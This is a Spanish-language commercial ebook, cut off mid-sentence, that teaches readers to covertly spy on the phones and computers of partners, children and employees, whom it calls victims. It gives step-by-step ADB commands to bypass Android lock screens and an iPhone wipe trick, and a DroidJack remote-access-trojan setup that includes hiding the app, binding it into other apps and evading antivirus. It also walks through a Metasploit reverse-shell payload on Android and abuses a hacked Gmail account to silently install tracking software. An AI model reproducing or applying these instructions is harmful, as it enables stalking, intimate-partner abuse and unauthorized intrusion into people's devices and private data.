Espiar Cualquier Celular y PC Totalmente Gratis Método Espía Especial Espiar Cualquier Celular y PC Totalmente Gratis © Page | 1 Estrategias Avanzadas Para Espiar Celulares: La Guía Paso por Paso de Espionaje Altamente Efectivo, ©2015 Todos Los Derechos Reservados. Advertencias: Al continuar leyendo este libro electrónico, usted declara que es mayor de 18 años y que es legal leer y poseer este material en su país y/o jurisdicción. Usted acepta y está de acuerdo al leer esta información que el autor, el editor, el propietario, accionistas, afiliados y empleados de Exur, S. A. y de Comoespiarmoviles.net no aceptan o asumen ninguna responsabilidad o compromiso por el uso indebido o abuso de del contenido de este libro electrónico y expresamente se desligan de todas las garantías implicadas. Este libro electrónico está hecho para fines educativo. Exur, S. A. no garantiza que el documento o información esté libre de errores, ajustada a su propósito cumplirá cualquier criterio en particular por el desempeño o la calidad. Page | 2 Tabla de contenido Métodos de Desbloqueo de Patrón de Seguridad para Smartphones Desbloquear pantalla de seguridad Android no rooteado (Página 7) Desbloquear pantalla de seguridad Android rooteado (Página 17) Desbloquear pantalla de seguridad iPhone (Página 20) Guardar copia de seguridad iOS en iCloud (Página 26) Guardar copia de seguridad iOS en iTunes (Página 27) Métodos de Espionaje para Android DroidJack (Página 29) Hackear móvil Android Kali Linux (Página 35) Lost Android (Página 46) Cell Tracker (Página 55) Métodos de Espionaje para Iphone Tutorial TaiG Jailbreak para iOS (Página 57) Ejecutando Android en iPhone (Página 60) Mobipast (Página 63) BosSpy (Página 71) Métodos de Espionaje para PC Livesnoop (Página 77) Revealer Keylogger Free 2.0 (Página 82) Métodos de Phishing (Hack de correos y contraseñas) Tutorial (Página 85) Métodos anti-espionaje Anti-Spy Mobile Free (Página 91) Page | 3 Rooteo de Android (Acceso Root) Tutorial King Root (Página 92) Apéndice: Software y Términos Cydia (Página 97) Jailbreak (iOS) (Página 103) iDroid (Página 104) Kali Linux (Página 105) Spyware (Página 105) iCloud (Página 105) iTunes (Página 105) ADB (Página 106) Metasploit (Página 106) WinRar (Página 106) Programa Para Espiar Móviles DroidJack Véase La “Página 29” Para Ver el Tutorial. Page | 4 Introducción Quizás le parezca un poco exhaustiva y larga toda esta información, pero permítame decirle que no necesitará todo lo que está escrito aquí. Esta guía está divida en diferentes tipos de estrategias para darle la comodidad y libertad de elegir la que necesite. Este video de introducción le ayudará a entenderlo mejor: http://mfi.re/watch/4625lyhrxlqd46a/Introducción_Spy.mp4 Este material instructivo está diseñado para que se libere fácilmente de las dudas y tenga paz mental con asuntos relacionados con la familia, los negocios y la vida amorosa, ya que gracias a la excelente decisión que ha tomado al elegir este magnífico libro electrónico, tendrá la oportunidad de ver por usted mismo(a) lo que realmente hacen sus hijos, sus empleados y su pareja a través de un monitoreo constante de sus celulares y computadoras. Y todo esto de manera increíblemente fácil. De hecho, este libro está hecho mostrando cada paso con imágenes de qué hacer en cada ocasión, brindándole así un servicio personalizado de antemano; es por esto que puede estar totalmente seguro(a) de que sus dudas terminan aquí sin importar cuál sea su nivel académico, ya que los pasos son tan sencillos que hasta un niño de 4 años de edad puede seguirlos. En este contenido trataremos diversos temas de diversas aplicaciones y tecnología que hacen posible el espionaje efectivo de celulares y computadoras, y lo mejor de todo, que es 100% Gratis! No tendrás que pagar un centavo para adquirir los programas ni las aplicaciones, aunque hay algunas funciones que están a opción suyas si comprarlas, pero le aseguro que con solo la versión gratis será más que suficiente, ya que no tendrá límite de tiempo en la libertad de sus acciones y logrará la paz mental que necesita. Los requisitos para cada estrategia serán explicados en cada lección. ¡Tenga una magnífica expedición! Page | 5 Métodos de Desbloqueo de Patrón de Seguridad para Smartphones En esta parte aprenderemos cómo desbloquear las pantallas de seguridad para ingresar a la mayoría de dispositivos, incluyendo teléfonos Androids Rooteados como Androids no Rooteados. También para las diferentes versiones de iPhone. Obviamente si queremos ingresar al móvil de la víctima, necesitamos alguna estrategia. Ya sea esperar a que se descuide y deje el celular desbloqueado, o… algo mucho mejor XD, Muahahaha! Si tomamos el celular de la víctima, en la mayoría de los casos, como tú mismo sabrás si usas Smartphone, nos encontremos con molestas pantallas de seguridad como las siguientes: Page | 6 Existen patrones de seguridad por huellas dactilares. Entre otros patrones. La verdad es que todos estos patrones pueden ser burlados con los siguientes métodos que aprenderás a continuación. Desbloquear pantalla de seguridad Android (no rooteado): Ahora aprenderá cómo desbloquea cualquier pantalla de un celular Android no rooteado con un programa de Hackeo, que será llave fundamental para conseguirlo. Requisitos • • • • • Android de la víctima en mano, tiene que ser un android no rooteado. Un ordenador dónde instalar el programa ABD Instalar el programa ABD en el ordenador Conectar el Android a la PC vía USB y seguir los procedimientos a continuación La opción “USB Debugging” (Depuración USB) debe estar habilitada Dónde conseguir el programa Este link te servirá para descargarlo: https://docs.google.com/uc?authuser=0&id=0B0MKgCbUM0itNVB1elljU2NPR0k&export=download Esta es una versión más antigua, por si la de arriba no te funciona: https://docs.google.com/uc?authuser=0&id=0B0MKgCbUM0itSUhpUklCTFpzWkE&export=download Estas son descargas automáticas, basta con solo poner el link y comenzará a descargarse. Page | 7 Instalación de Drivers ADB Los drivers ADB son las configuraciones que permitirán la instalación del programa ADB, los pasos de instalación son muy sencillos. Paso 1: Descargamos los ADB Drivers del Link ya mencionado. Paso 2: Abrimos el instalador en la carpeta descargada, como vemos a continuación. Paso 3: Digitamos “y” en la terminal que nos aparece. Pulsamos Enter. Page | 8 Paso 4: Nos pide confirmación nuevamente para otra instalación, pulsamos “Y” y Enter. Paso 5: Seguimos con lo mismo, pulsamos “y” de nuevo para confirmar. Paso 6: Nos aparecerá un resultado que dice “Installing… driver”. Aparecerá una pestaña de instalación, pulsamos siguiente y finalizamos la instalación. Y ya tendremos instalado el ADB. En caso de que no funcione puedes buscar ayuda en la misma página donde lo descargaste. Para comprobar si ya está listo, solo abrimos una terminal y ponemos “adb”, el resultado mostrará todo. Page | 9 Ejecución de ADB Paso 1: Procedemos a conectar el cable USB desde la PC al dispositivo, estando bloqueado. Como ahora. Paso 2: Ejecutamos el programa después de haberlo extraído de la carpeta descargada. Ejecutamos en una terminal, tan solo escribiendo “cmd” en el buscador de Windows nos aparecerá nuestra línea de comandos, click y abrimos nuestra terminal. Paso 3: Una vez abierta, nos aparecerá una terminal como esta, en la cual pondremos nuestras líneas de comandos para desbloquear el dispositivo. Lo primero que debemos digitar es el comando “adb shell”. Page | 10 Paso 4: Digitamos el siguiente comando en la terminal: “rm /data/system/gesture.key” como puedes ver a continuación. Pulsamos “Enter” para ingresarlo. De esta manera la seguridad queda desbloqueada. Ahora, lo que debemos hacer es sencillamente reiniciar el dispositivo para que haga efecto. Paso 5: El siguiente paso es ingresar el comando: adb Shell y luego # reboot para reiniciar. Pulsamos “Enter” una vez más. Inmediatamente después de haber escrito el comando, el dispositivo comienza a reiniciarse. Esto es buena noticia. Esperamos a que termine el reinicio. Page | 11 Paso 6: Una vez terminado el reinicio, la operación habrá sido un éxito. Ahora ponemos cualquier patrón y la pantalla se desbloqueará. Sin importar cuán ridículo sea, cualquier cosa que intentemos violará la seguridad. Como ves en la siguiente imagen y la que le sigue. Existe la posibilidad de que este método no le funcione, ya que puede funcionar para una determinada cantidad de modelos Android. Por eso existe otra estrategia alterna a ésta, que es la siguiente. Page | 12 Opción #2 Este es un camino más largo, pero si el primer método te falló, este es el que debe funcionarte. Digitamos “adb shell” y luego el comando que puedes ver debajo, “cd /data/data/com.android.providers.settings/databases”. Luego digitamos: “sqlite3 settings.db”. Después de digitar lo anterior, nos aparecerá un resultado como el siguiente. Luego ponemos el siguiente comando: “update system set value=0 where name=’ lock_pattern_autolock’ ;”. Seguimos con el comando: “update system set value=0 where name=’ lockscreen.lockedoutpermanently’ ;” Luego digitamos sencillamente “.quit”. Y ya todos estará resuelto, reiniciamos y el patrón se romperá sin importar lo que ingresemos. Aquí ya tenemos el celular desbloqueado. Pero no debemos dejarlo sencillamente así. Lo más recomendable sería ir a cambiar la configuración de seguridad para añadirle un nuevo patrón de Page | 13 desbloqueo, cambiando el estilo, le ponemos uno que solo tengamos mover un ícono para abrirlo. Esto debemos hacerlo para que sea menos notable para la víctima que su celular haya sido hackeado, aunque obviamente se puede dar cuenta de que ese no era su patrón de desbloqueo. En este caso debemos dejarle en patrón de desbloque más sencillo, de esa manera, la víctima puede llegar a pensar que sencillamente el celular tuvo algún error técnico y lo más probable es que lo deje así, ya no que no presentará ningún otro inconveniente. Lo más probable es que la víctima cambie su patrón nuevamente a uno más seguro. Esto no importa, porque ya para ese entonces habremos instalado nuestra aplicación espía al teléfono de la víctima. Sin importar lo seguro que sea su patrón, ya el daño está hecho y no le servirá de nada. De ahí en adelante la información del teléfono irá hacia nosotros automáticamente, trayendo consigo la información de contactos, mensajes, llamadas, grabación de llamadas, datos multimedia, etc. La información del celular queda bajo nuestro dominio, donde será enviada por internet a nuestro correo electrónico, o a la página oficial de la aplicación, dependiendo de cuál aplicación instalemos en el teléfono de la víctima. Ahora bien, también tenemos la opción de sencillamente violar la seguridad para instalar la aplicación espía, ocultarla, y luego desconectar el dispositivo del teléfono; lo cerramos y cuando lo volvamos a abrir en patrón de seguridad seguirá estando ahí, como si nada hubiese pasado. Probablemente esta sea la mejor opción en la mayoría de los casos, pero en realidad todo dependerá de las circunstancias. Es usted quien debe determinar de qué manera le conviene más. No volveremos a necesitar acceso físico al teléfono de la víctima nunca más. Page | 14 Paso 7: Vamos a las configuraciones, pulsamos “Settings”. Ya sea en el escritorio como en el menú general. Debe aparecernos esto. Con símbolo de llave o rueda mecánica. Paso 8: Vamos a “Security” o Seguridad en español en el menú que aparece. Paso 9: Pulsamos donde dice “Screen Lock”, o Bloqueo de Pantalla para elegir un nuevo patrón. Page | 15 Paso 10: Elegimos el patrón llamado “Slide” o de Deslizamiento. Con el cual la víctima podrá abrir su teléfono deslizando el ícono del candado en la pantalla inicial. Page | 16 Desbloquear pantalla de seguridad Android (rooteado): En esta parte aprenderemos a desbloquear la pantalla de seguridad de Androids rooteados. Requisitos • Android de la víctima en mano, tiene que ser un android “rooteado”. • Un ordenador dónde instalar el programa ABD • Instalar el programa ABD en el ordenador • Conectar el Android a la PC vía USB y seguir los procedimientos a continuación “USB Debugging” (Depuración USB) debe estar habilitada. La opción Dónde conseguir el programa Este link te servirá para descargarlo: http://www.mediafire.com/download/s189hjjcn31gc16/adb+%281%29.zip Paso 1: Conectamos el dispositivo android bloqueado a la PC vía USB. Procedemos a abrir la carpeta del programa “adb” una vez haya sido extraído de la carpeta comprimida descargada. Paso 2: Pulsamos las parte donde dice “Open command window here” (Abrir comando aquí). Page | 17 Paso 3: Escribimos el comando: adb devices en la nueva terminal que se abrirá, cómo la siguiente. Esto sirve para mostrar todos los dispositivos android que estén conectados a la PC; en este caso, solo uno. Paso 4: Escribimos el siguiente comando en la terminal, como vemos en esta lista, el número 2. Pulsando “Enter”. Paso 5: Ingresamos el comando que sigue en la lista y “Enter”. El comando cd data/system sirve para convertir los patrones de seguridad en datos leíbles para el sistema. Page | 18 Paso 6: Continuamos con el siguiente comando de la lista. Con el cual podremos habilitar la función de Super Usuario. Lo ponemos en la terminal como siempre lo hemos hecho. Paso 7: Finalizamos con el último comando. En cual eliminará del teléfono todos los datos de seguridad, permitiendo así la entrada fácil. Cuando mires el teléfono, todavía tendrá el patrón. No hay de qué preocuparse, pulsa cualquier patrón y se desbloqueará inmediatamente, sin importar cuál sea. Ya que ya no cuenta con registros de seguridad. Entonces procedemos a instalar la aplicación espía que más le convenga, que más adelante le mostraremos una buena cantidad de ellas que realmente funcionan. Puedes dirigirte a la sección “Métodos de espionaje para android”. Page | 19 Desbloquear pantalla de seguridad iPhone: Ahora aprenderás cómo desbloquear cualquier pantalla de seguridad iPhone, guardando nuestros datos en la base de datos iTunes y reiniciando el teléfono sin perder la información. La víctima no notará que eso sucedió con su teléfono. Pero se corre el riesgo de perder todos los datos en caso de que no tengamos acceso a la PC de víctima, donde debería estar instalado el programa iTunes. Por eso le sugiero que siga los pasos con sumo cuidado. No nos hacemos responsables de sus errores. Requisitos • iPhone de cualquier modelo • Un ordenador con iTunes instalado (Muy preferiblemente que sea el ordenador de la víctima) • Conectar el iPhone a la PC vía USB y seguir los procedimientos a continuación Bien, comencemos, probablemente tendremos una pantalla de seguridad como esta. Paso 1: Apagamos el iPhone normalmente. Page | 20 Paso 2: Mantenemos pulsado el botón de inicio. Paso 3: Mientras lo mantenemos pulsado, conectamos el cable USB. Esto activa el modo recuperación. A continuación nos aparecerá una imagen como esta, indicando con el símbolo de iTunes que el iPhone está conectado vía USB. Aparecerá en la pantalla el en siguiente mensaje: “iTunes has detected an iPhone in recovery mode…” (iTunes ha detectado un iPhone en modo recuperación…) Pulsamos ok. Page | 21 Paso 4: Pulsamos el botón “Restore iPhone” Paso 5: Aparecerá una pantalla de confirmación en la se nos da dos opciones, pulsamos la que dice “Restore and Update”. Una vez presionamos “Restore and Update”, nos aparecerá una barra en la parte de arriba de la pantalla indicando la extracción de software que se instalará en el iPhone. Page | 22 También en el iPhone aparecerá la barra de progreso. Esperamos a que termine de cargar… Una vez termine de cargar completamente aparecerá una pantalla de confirmación de lo ya logrado que dice: “Your iPhone has been restored to factory settings”. Pulsamos OK. En el teléfono comenzaremos a recibir los saludos de inicio… Page | 23 Paso 6: Habilitamos los servicios de locación o lo deshabilitamos. Paso 7: Esta es una parte fundamental del proceso, ya que si lo hacemos mal podríamos borrar totalmente la información almacenada en el dispositivo. Vemos 3 opciones, la primera para restaurar el teléfono como de fábrica, la segunda es para restaurar desde iCloud y la tercera desde iTunes. Podemos restaurar la información que de por sí pertenece al teléfono eligiendo una de las dos últimas, la que hayamos elegido anteriormente para hacerlo. Eso sí, debemos estar en la PC de la víctima donde el iTunes está instalado en caso de que queramos hacer la recuperación. En caso de que no quieras hacer la recuperación y dejarlo de fábrica para luego hacerte el tonto y decir a la víctima que no sabes lo que sucedió con su teléfono (lo cual es una opción, XD), entonces procedemos a elegir “Set Up as a New iPhone”. Page | 24 Si quieres crear un Apple ID puedes crearlo, pero no lo recomiendo si es el teléfono de la víctima, puede arruinar toda la operación. Lo mejor es que lo saltemos pulsando Skip This Step. Paso 8: Pantalla para crear contraseña. Puesto que estamos en el celular de víctima no creamos ninguna para que no sospeche. Pulsamos la opción debajo “Don’t Add Passcode”. El teléfono funcionará normal de ahí en adelante. Lo único que la víctima notará es que el patrón de seguridad ya no está, y lo más seguro es que sencillamente lo vuelva a configurar en medio de la confusión. Asumiendo así que la víctima no sospeche de ti. Entonces, una vez desbloqueado, ya podemos instalarle la aplicación espía de nuestra elección. Las aplicaciones las conocerá más adelante en las próximas lecciones. Page | 25 Guardar copia de seguridad iOS en iCloud: Es de suma importancia guardar una copia de seguridad de todos los datos del teléfono antes del proceso, de esta manera nos aseguramos de no perder nada. Para hacer una copia de seguridad en iCloud hacemos lo siguiente: 1. Conecte el dispositivo a una red Wi-Fi. 2. En iOS 8 o posterior, vaya a Settings> iCloud> Backup. 3. En iOS 7 o anterior, vaya a Settings> iCloud> Storage and Backup. 4. Asegúrese de que “iCloud Backup” esté encendida en la pantalla que le aparece. 5. Toque “Back Up Now". Mantente conectado a tu red Wi-Fi hasta que el proceso se complete. 6. Asegúrate de que la copia de seguridad haya terminado tocando Settings> iCloud> Storage> Manage Store, y seleccione su dispositivo. La copia de seguridad que acaba de hacer debe aparecer en los detalles con su respectivo tiempo y tamaño. De esta manera ya no tendremos que preocuparnos en caso de que algo salga mal. Back Up automático iCloud Después de haber activado la copia de seguridad de iCloud, iCloud puede automáticamente hacer un Back UP de tu dispositivo cada día. iCloud ejecuta estas copias de seguridad automáticas diarias sólo si: • El dispositivo está conectado a una fuente de alimentación. • El dispositivo está conectado a una red Wi-Fi. La pantalla de su dispositivo está bloqueado. Page | 26 Guardar copia de seguridad iOS en iTunes: 1. Abre iTunes y conecta el dispositivo al ordenador. 2. Guardar el contenido que has descargado desde la tienda de iTunes o App Store haciendo clic en File> Devices> Transfer Purchases. Si utilizas Windows y no ves un menú “File”, pulsa la tecla Alt. Espere a que iTunes termine la transferencia de sus compras. A continuación, haga clic en Files> Devices> Back Up. Si utiliza Windows y no ver un menú Archivo, pulse la tecla Alt. Page | 27 Después de que termine el proceso, se puede ver si la copia de seguridad ha finalizado correctamente, haga clic en Preferencias de iTunes> Dispositivos. Debes ver el nombre de tu dispositivo con la fecha y hora que iTunes haya creado la copia de seguridad. Page | 28 Métodos de Espionaje para Android Esta sección está dedicada a los métodos infalibles para espiar celulares Android. Todo explicado en todo detalle en lenguaje sencillo para asegurarnos de que lo comprenda a plenitud y pueda comenzar su espionaje efectivamente. Hackear móvil Android con DroidJack: A continuación le mostraremos el video tutorial que le enseñará paso por paso, asegurándonos de cubrir todas las áreas pertenecientes a estos procedimientos. Cada punto será explicado de forma detallada. Este es el enlace de descarga DroidJack V4.4: https://mega.nz/#!9D4EmDQL!4sidmwWiiZZ5RNW07O1Q7dcqJVGp6rjw9E_gfcvcdVY Para descargar el archivo correcto en Mega, debemos pulsar el botón “download with browser” (descargar con navegador), que es el botón gris, como lo muestra esta imagen. (No pulse el botón rojo). Este es el enlace de descarga DroidJack V3: https://mega.nz/#!W0pEEZpJ!JdtRKwHhj19O9Aac_RsFaJMiIFnugDLbh0MZyAwYUU8 Page | 29 Recordatorio! Debe tener Java instalado o actualizado para poder ejecutar este programa. La siguiente imagen muestra la página oficial donde podrá descargar o actualizar su versión de Java. Si no se asegura de eso, puede que el archivo no se ejecute: Este enlace a continuación le va a redirigir al video tutorial completo del programa DroidJack: https://vimeo.com/140975899 Le pedirá una contraseña para verlo, la contraseña es: “metodoespia-2015” Cualquier duda, pregunta o problema, por favor contacte al Soporte al Cliente en este enlace: http://support.comoespiarmoviles.net/soporte/ Instrucciones Escritas y Detalladas, preguntas frecuentes DroidJack v4.1 – Herramienta de Administración Remota Android Autor: -------Page | 30 L.R Sanjeevi (c) 2015. Actualizaciones de la versión 3.3: ----------------* Lector de WhatsApp – Para dispositivos root solamente. * Activación por llamada – Activa la conexión de internet en dispositivos desconectados con solo llamar desde un número en específico. * Cambiador de íconos – Puedes cambiar el ícono de su APK en el APK Generator. * Reset DroidJack Server – Reinicio del servidor DroidJack para mejorar la eficiencia si es necesario. * Reset Data Transfer port – En caso de cualquier inconveniente, use esta opción para reiniciar el puerto de transferencia. * Nota personal – Una nota para guardar cualquier información personal del dispositivo. * Se corrigieron errores del Remote Eyes entre otros bugs menores. Instrucciones de configuración: -------------------1) Registrar un DNS dinámico de no-ip o dnsdynamic.com 2) Elegir un puerto (Ejemplo: 1337), redirigir el puerto elegido (1337) y el puerto 1334 (por defecto), por lo cual necesitas abrir 2 puertos! 3) Generar la APK con el puerto elegido (1337) y su DNS dinámico, entre otros detalles! 4) No escané su aplicación generada en la página Virustotal.com, para que pueda mantenerse indetectable por más tiempo. Tutorial detallado: ------------------Conectividad WAN (Via Internet) ------------------------------1) Entre su dirección no-ip en la casilla Dynamic DNS y su puerto (Ejemplo: 1337) en la casilla “port” mientras se genera la aplicación. 2) Actualice el no-ip usando el no-ip DUC. 3) Abra el puerto elegido (1337) y el puerto por defecto 1334 (ambos en protocolo TCP y UDP). ********************* Pasos opcionales ********************* 4) Active el puerto 1334 (por defecto) en el DroidJack, en la sección “Devices”. 5) Verifique si el puerto 1334 (default) está abierto haciéndole un escaneo en este enlace http://www.whatsmyip.org/port-scanner/. (También verifique si el puerto 1334 (default) se muestra abierto aún si no lo estamos usando con el DroidJack. Esto es solo para asegurarnos de que ningún otro software esté usando el puerto por defecto 1334. ********************************************************** 6) Active el puerto (1337) en DroidJack. 7) Verifique si el puerto elegido (1337) está abierto. (Verifique también si el puerto 1337 se muestra abierto cuando su conexión NO ha sido habilitada en el DroidJack. Esto es solo para asegurarnos de que ningún otro software esté usando el puerto elegido (1337). Page | 31 8) Instale la aplicación en su teléfono y ábrala. 9) Conecte el móvil víctima vía data móvil o a cualquier otro WiFi alrededor de mundo. Connectividad de su Red de Área Local (LAN) ----------------1) Entre la dirección LAN IPV4 de su computadora (Digite “ipconfig” en una terminal de comandos y use la IP versión 4) en la casilla “dynamic DNS” and su puerto elegido (Ejemplo: 1337) en la casilla “port” mientras generamos la APK. 2) Escuche el puerto elegido (1337) en DroidJack. 3) Asegúrese de que ningún otro software esté usando el puerto (1337) ni el puerto 1334 (por defecto). 4) Instale la aplicación en su teléfono y ábrala. 5) Conectese a su misma LAN (Red de área local) donde su computadora está conectada vía WiFi o cableado. Preguntas Frecuentes: ------- 1) No puedo ingresar a la aplicación! Resp) Verifique que su PC no esté lenta o sobrecargada. Si es necesario un reinicio, reiníciela. 2) Soy capaz de loguearme pero la aplicación se minimiza! Resp) Cierre la aplicación y ábrala después de 15 minutos. Si el problema persiste por mucho tiempo, elimine su IP y tome una nueva (Esto se hace reiniciando el router de su fuente de electricidad por unos segundos o usando cualquier VPN). 3) No estoy teniendo la conexión con el dispositivo, aun asegurándome de haber producido bien la aplicación! Resp) Verifique si está tratando de conectarse en su misma red local o de otra conexión y siga el tutorial que corresponde con el procedimiento que quiere hacer. Si el problema persiste entonces desactive su firewall o añada una excepción en el firewall. 4) Tengo conexión con el dispositivo pero ninguna de las características funcionan! Resp) asegúrese de que el puerto (1334) esté abierto tanto para TCP como UDP y asegúrese de que ninguna otra aplicación esté usando ese puerto. Siga el tutorial de nuevo. 5) He usado el modo “Stealth” pero la aplicación sigue siendo visible! Resp) La aplicación debe ser abierta al menos una vez, entonces automáticamente el ícono se ocultará. En algunos dispositivos, después de un reinicio el ícono desaparecerá. Page | 32 6) Estoy teniendo un error cuando intento ligar la aplicación con un juego o de otro tipo! Resp) Intente mezclar el virus con otra aplicación o juego. Algunos juegos o aplicaciones están diseñados para auto-escanearse y no permiten la mezcla. 7) He mezclado el virus con otra aplicación que funciona bien pero no obtiene la conexión! Resp) Una vez que la aplicación mezclada es instalada e abierta, el dispositivo necesita desconectarse del internet y conectarse de nuevo, entonces ahí se conectará al cliente. 8) Puedo usar un puerto diferente que no sea el 1334 (puerto por defecto)? Resp) No. El puerto 1334 es el que debe estar abierto solo para el DroidJack. 9) Los números de teléfono de los dispositivos se muestran como "Not Registered"! Resp) Eso es porque el número de teléfono no está registrado con el dispositivo. Por lo cual no es accesible vía API. 10) Cómo se calcula el tiempo de inactividad? Resp) Cuando la pantalla del dispositivo se apaga. 11) No puedo subir archivos al teléfono! Resp) Verifique si tiene permiso de escritura en ese folder. Puede darse cuenta seleccionando el folder. 14) How to open an app using the App Manager? Resp) Haga doble click en el ícono para abrir la aplicación en el dispositivo. 15) Cómo obtener la localización GPS actual? Resp) Use la función "Current GPS". Después de un rato pulsamos la función "Last Checked In". Puede tomarse mucho tiempo si el teléfono no se está moviendo o si está en un país donde el GPS no es lo suficientemente bueno. 16) Remote Eyes no está funcionando o dura demasiado! Resp) Durante el primer uso de Remote Eyes usted necesita poner la calidad primero en las configuraciones de dicha función: “Settings”. 17) Cómo usar la función Update/Install? Resp) Necesita subir la APK a un host con un link de descarga directa y pegar el link en la casilla. 18) La conexión entre mi cliente y el dispositivo está lenta! Resp) Use la función "Reset DJ Server". Page | 33 19) Algunas características estaban funcionando pero despúes de abrir una de ellas se congeló, y después de eso ninguna otra característica funciona! Resp) Reinicie el puerto de transferencia haciendo click en la etiqueta "Status:" (Cerca de la casilla que dice: “port number”, ahí aparecerá la etiqueta llamada saying "Status:". 20) Qué tipo de nombres son permitidos en la función "Change Package Name"? Resp) El paquete debe estar escrito en minúsculas. Solo puede contener letras y números. Puede tener un punto entre palabras pero no al principio ni al final. (Ejemplo: El nombre del paquete puede ser "hello.world" pero no "hello.world.” Page | 34 Hackear móvil Android con Kali Linux y Metasploit: En este tutorial aprenderemos a hackear cualquier móvil Android usando las consolas msfpayload y msfconsole en Kali Linux. Esto debe instalarse un su PC, no en la PC de la víctima. No necesita acceso físico al celular de la víctima para hackearlo. Requisitos: Kali software en el sistema operativo Linux (solamente). Framework Metasploit actualizado. Características fundamentales Espionaje de actividad del sistema, incluyendo manejo e instalación de aplicaciones. Paso 1: Ejecutamos el siguiente comando en una terminal vacía de Kali Linux. Una vez insertado este comando, le aparecerá en la pantalla este resultado: Page | 35 Paso 2: Ponemos “ls” en la línea de comandos e ingresamos. Ahora el archivo ya se ha creado, entonces solo debemos enviar el archivo a la víctima y tendrá que instalar ese archivo de aplicación en su celular android. Paso 3: Pero antes de eso, para aceptar conexiones, necesitamos ir a “msfconsole”, digitando: “msfconsole” en una nueva terminal: Page | 36 Tomará algo de tiempo, esperamos pacientemente… Luego aparecerá una pantalla similar a esta: Paso 4: Ya lo tenemos, entonces en esa nueva terminal que aparece, la “msfconsole”, vamos a buscar el multihandler. Ponemos la siguiente línea de comandos: “search multi/handler” de la siguiente manera. Page | 37 Pulsamos “Enter” y nos aparecerá el siguiente resultado: Paso 5: Entonces a continuación debemos digitar “Use exploit/multi/handler”. Page | 38 Paso 6: Configuramos el “payload” que habíamos tomado en “msfpayload” (android/meterpreter/reverse_tcp), entonces insertamos “set PAYLOAD android/meterpreter/reverse_tcp” y la terminal se verá como la siguiente: Y ya el “payload” está configurado. Paso 7: Ponemos las opciones como LHOST y LPORT (la misma que hemos dado en “msfpayload”). Para eso ponemos “show options”. Podemos ver que el LPORT ya está ahí con su valor. Page | 39 Paso 8: Ahora solo debemos cambiar el LHOST. (Si es que en su pantalla no le aparece, lo puede configurar manualmente). Podemos utilizar el siguiente comando: “set LHOST 192.168.0.121”. Una vez hecho esto, el valor para LHOST ya fue definido. Podemos digitar nuevamente “show options” para ver los nuevos valores de LHOST y LPORT. Page | 40 Paso 9: Digitamos “exploit” y aparecerá algo como esto. En la segunda línea de los resultados veremos: “Starting the payload handler…” Ahora todo ya está configurado. Solo esperamos a que la víctima cliqué en el archivo que creaste. Una vez caiga en la trampa, recibirás una conexión “meterpreter”. La terminal se verá como la siguiente: Como puedes ver, ahora cuentas con una sesión “meterpreter”. Page | 41 Para más información de lo que hemos hecho, digitamos en comando “sysinfo”. Vemos que el resultado en OS narra una unión entre Linux y Android. Si a continuación ingresamos el símbolo de interrogación “?” vemos a la siguiente información: Si ponemos “Ifconfig”, revelará las interfaces: Page | 42 Para revelar la información contenida en el android, ponemos los siguientes comandos en orden: “pwd” luego “cd..” seguido de “cd /” y “ls”. Como en la siguiente imagen: De esta manera hemos obtenido un árbol completo de archivos como la siguiente: Page | 43 Paso 10: Ingresamos a la tarjeta SD con los comandos: “cd sdcard” y “ls” como la siguiente imagen: Luego ponemos “cd download” y “ls” seguido… Page | 44 … y podemos ver las aplicaciones que ese individuo ha descargado. Podemos incluso hacer modificaciones en el teléfono de la víctima. Dónde descargar el programa En la página oficial Kali.org de manera gratuita. Page | 45 Lost Android: Esta maravillosa aplicación fue diseñada con el propósito de ayudarte a encontrar el dispositivo perdido o robado sin importar en qué parte del mundo se encuentre. Características fundamentales Todas estas funciones se hacen remotamente a través del internet. * Leer mensajes enviados y recibidos * Limpiar el teléfono * Bloquear teléfono * Borrar Tarjeta SD * Localizar mediante GPS o red * Iniciar alarma con pantalla parpadeante * Enviar SMS desde la página web * Mensajes emergentes * Re-direccionar Llamadas * Estado del teléfono: batería, imei, etc * Alarma SMS a distancia * Bloqueo de y desbloqueo de la mensajería remotamente * Borrado remoto de tarjeta SD por SMS * Borrado de memoria de teléfono vía SMS * Control remoto APN vía SMS * Inicio / parada de GPS * Inicio / parada de WIFI * Mantenerse en actividad oculta frente al lanzador * E-mail se te envía cuando se cambia la tarjeta SIM * Obtener lista de llamadas * Tomar fotos con cámara frontal * Tomar fotos con la cámara trasera * Hacer que el teléfono hable con conversión de texto a voz * Comando de texto * Comando hablar SMS * Bloqueo de Tiempo de espera * Restaurar la configuración de arranque * Grabar sonidos desde el micrófono Page | 46 * Iniciar y detener la conexión de datos vía SMS * Iniciar y detener la conexión WIFI vía SMS * Recaudar el contenido del navegador La aplicación no hace ningún sondeo a servidores externos, así que no hace gastos extras de batería. Tutorial Lost Android En caso de que ya hayamos hackeado la cuenta de Gmail de la víctima, podemos tomar esa misma cuenta para ingresar como cuenta de Google en cualquier computadora o dispositivo. De esta manera, con la cuenta de Gmail de la víctima, podemos instalar libremente cualquier aplicación de manera remota, sin importar en qué país la víctima esté. Paso 1: Solo debemos 1) Ingresar con la cuenta, 2) Poner en el buscador el nombre de la aplicación, 3) Instalar la aplicación pulsando el botón instalar que aparece en verde. Una vez hecho esto, la aplicación comenzará a instalarse remotamente vía internet en el celular de la víctima, sin avisarle ni confirmar nada. (En caso de que tenga el celular en mano, puede romper la seguridad de bloqueo e instalar la aplicación manualmente). La imagen siguiente muestra cómo se instalaría remotamente. Page | 47 La víctima recibirá una notificación como ésta que dice “Lost Android” (pie de página), por la cual quizás comience a preguntarse qué es eso. Es ahí donde debemos usar ingeniería social solo en caso de que la víctima sospeche que su cuenta de Gmail ha sido hackeada. Es muy probable de que la víctima sencillamente la abra y no encuentre nada interesante en ella, y termine dejándola quieta sin saber qué es. El ícono de la aplicación pasa brevemente desapercibida, ya que lo que expresa es sencillamente “Personal Notes” con un ícono de papel y lápiz, como si fuera sencillamente una aplicación aburrida y poco llamativa para guardar notas. Lo cual pude confundir tanto al ladrón que roba el celular, como a nuestra querida víctima de espionaje. Paso 2: Aquí es donde debemos invitar a la acción. De alguna manera, utilizando algún tipo de estrategia buena que se nos pueda ocurrir, debemos hacer que la víctima sencillamente pulse el botón llamado “Request Administrator rights” o (Pedir derechos de administrador). Una vez pulsado el botón, lo que sigue es hacer que la víctima pulse el botón activar que aparecerá después de pulsar este. En ese momento, si logras que la víctima lo haga o tú lo hagas en caso de que tengas el teléfono en mano, tendrás total control sobre el celular de víctima, podrás hacer todas las funciones antes mencionadas. Page | 48 Paso 3: Ya instalada y activada la aplicación, vamos a la página oficial “AndroidLost.com” en la cual abriremos 